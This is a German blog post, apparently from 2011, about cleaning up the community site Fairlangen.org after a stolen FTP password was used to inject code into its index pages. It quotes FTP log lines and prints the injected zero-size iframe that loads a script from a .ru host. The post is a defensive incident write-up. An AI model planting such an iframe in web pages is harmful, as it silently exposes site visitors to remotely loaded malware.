{"id":6067,"date":"2011-04-26T17:45:05","date_gmt":"2011-04-26T15:45:05","guid":{"rendered":"http:\/\/www.glorf.it\/blog\/?p=6067"},"modified":"2011-04-26T17:45:05","modified_gmt":"2011-04-26T15:45:05","slug":"fairlangen-org-wieder-entseucht","status":"publish","type":"post","link":"http:\/\/www.glorf.it\/blog\/2011\/04\/26\/webtech\/fairlangen-org-wieder-entseucht","title":{"rendered":"Fairlangen.org wieder entseucht"},"content":{"rendered":"

In unserer Gemeinde<\/a> betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org<\/a>. Dabei geht es darum sich darüber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. Über Wege, die mir noch nicht klar sind, hat ein Bösewicht Zugang zu dem<\/em> FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem bösartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite "index.php". Einem Menschen wäre sicher sofort aufgefallen, dass die index.htm und index.html nur über einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.<\/p>\n

Einen der Log-Einträge<\/a> habe ich bereits vorher erklärt (ist nur an zwei Stellen anonymisiert):<\/p>\n

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 \/www\/htdocs\/xxxxxxxx\/index.htm b _ o r yyyyyyyy ftp 0 * c
\nTue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 \/www\/htdocs\/xxxxxxxx\/index.htm b _ i r yyyyyyyy ftp 0 * c<\/code><\/p>\n

Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (174.37.220.147<\/a> sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):<\/p>\n

<iframe src=\"http:\/\/quake2012.ru\/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==\" width=\"0\" height=\"0\" frameborder=\"0\"><\/iframe><\/code><\/p>\n

Aus naheliegenden Gründen habe ich nicht ausprobiert, was dieser fremde Link für Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite würde nämlich sehr schnell von einschlägigen Seiten als bösartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite. <\/p>\n

Nach der Änderung aller Passwörter (und dem Eintragen der DB-Passwörter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als wäre die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich sämtliche Software darauf aktualisiert, das war ohnehin fällig.<\/p>\n

Aus der Erfahrung meine Tipps in der Situation:<\/p>\n